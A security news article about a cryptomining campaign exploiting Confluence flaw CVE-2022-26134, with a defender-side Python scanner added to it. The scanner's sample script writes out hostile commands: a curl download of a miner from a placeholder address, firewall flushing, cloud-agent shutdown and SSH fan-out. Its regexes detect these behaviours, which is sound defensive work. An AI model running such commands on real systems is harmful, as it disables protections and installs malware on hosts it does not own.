Attackers are targeting unpatched Atlassian Confluence servers as part of an ongoing cryptocurrency mining campaign.
Trend Micro researchers warn of an ongoing cryptocurrency mining campaign targeting Atlassian Confluence servers through the CVE-2022-26134 vulnerability.
Atlassian disclosed the flaw in early June, warning of a critical remote code execution vulnerability, at that time unpatched, that affects all supported versions of Confluence Server and Data Center and was being actively exploited in the wild.
“CVE-2022-26134 is a severity 9.8 unauthenticated remote code execution (RCE) vulnerability in the collaboration tool Atlassian Confluence. This gap is being exploited for malicious cryptocurrency mining,” reads the post published by Trend Micro. “If exploited without a fix, this vulnerability can be used in multiple malicious attacks, including full infrastructure domain hijacking, deployment of information stealers, remote access Trojans (RATs), and ransomware.”
In one of the attacks the researchers observed, the attacker exploited the flaw to inject OGNL expressions that downloaded and executed a shell script (“ro.sh”) on the victim’s machine. That script then fetched a second shell script (“ap.sh”).
The ap.sh shell script performs multiple actions: it updates the PATH variable to include the /tmp and /dev/shm paths, downloads the curl utility, disables iptables or changes the firewall policy action to ACCEPT, and flushes all firewall rules.
The script also downloads a binary file named “child” that exploits the PwnKit vulnerability; the ap.sh shell script then carries out the following actions.
The final stage of the attack chain downloads the hezb malware and kills processes associated with other competing coin miners.
The shell script also disables Alibaba and Tencent cloud service provider agents and performs lateral movement over SSH.
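As an added defender-side example (not code from the Trend Micro report or this article), the following Python scanner flags the second-stage behaviours described above in a captured shell script: PATH manipulation toward /tmp or /dev/shm, disabling or flushing the firewall, curl/wget downloads, killing competing miners, cloud-agent tampering and SSH fan-out. The regexes, the cloud-agent service names and the sample script are assumptions constructed for this example.

```python
import re
from typing import Dict, List

# Each indicator pairs a label with a regex for one behaviour the article
# attributes to ap.sh. The patterns (and the agent names aegis/aliyun/yunjing)
# are assumptions made for this example, not published detection signatures.
INDICATORS = [
    ("path_hijack_tmp", re.compile(r"PATH=\S*(?:/tmp|/dev/shm)")),
    ("firewall_disabled", re.compile(r"\b(?:systemctl|service)\b.*\b(?:stop|disable)\b.*\biptables\b")),
    ("firewall_policy_accept", re.compile(r"\biptables\b.*\s-P\s+\w+\s+ACCEPT\b")),
    ("firewall_flush", re.compile(r"\biptables\b.*\s-F\b")),
    ("download_tool", re.compile(r"\b(?:curl|wget)\b.*https?://")),
    ("cloud_agent_tamper", re.compile(r"\b(?:systemctl|service)\b.*\b(?:aliyun|aegis|yunjing)\b", re.I)),
    ("kill_competing_miners", re.compile(r"\b(?:pkill|killall)\b")),
    ("ssh_lateral_movement", re.compile(r"\bssh\b.*StrictHostKeyChecking=no")),
]

def scan_script(text: str) -> Dict[str, List[int]]:
    """Map each matched indicator label to the 1-based line numbers where it fires."""
    hits: Dict[str, List[int]] = {}
    for lineno, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):  # skip shebang and comments
            continue
        for label, pattern in INDICATORS:
            if pattern.search(stripped):
                hits.setdefault(label, []).append(lineno)
    return hits

def verdict(hits: Dict[str, List[int]], threshold: int = 3) -> str:
    """Crude triage: several distinct behaviours together look like ap.sh-style staging."""
    distinct = len(hits)
    if distinct >= threshold:
        return "likely-cryptominer-stager"
    return "suspicious" if distinct else "clean"

# Constructed sample resembling the described second stage; the addresses are
# TEST-NET-2 documentation addresses, not real infrastructure.
SAMPLE_SCRIPT = """#!/bin/sh
# constructed sample, not the real ap.sh
export PATH=/tmp:/dev/shm:$PATH
curl -s http://198.51.100.7/hezb -o /tmp/hezb
systemctl stop iptables
iptables -P INPUT ACCEPT
iptables -F
systemctl stop aliyun.service
pkill -f xmrig
ssh -o StrictHostKeyChecking=no root@198.51.100.8 uptime
"""
```

Running `scan_script(SAMPLE_SCRIPT)` on the constructed sample reports every indicator with its line number, and `verdict` classifies the sample as a likely miner stager.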
“While we have confirmed that this vulnerability is being exploited by cybercriminals for illicit cryptocurrency mining activities, it is very easy to exploit for other breaches, so we urge users to make it a priority to patch this gap as soon as possible,” concludes the report. “The attacker used the injection of their own code for interpretation to gain access to the targeted Confluence domain and control the server for subsequent malicious activity. They can carry out a variety of attacks, from smashing to damaging the infrastructure itself.”
(Security related – hacking, Atlassian Confluence)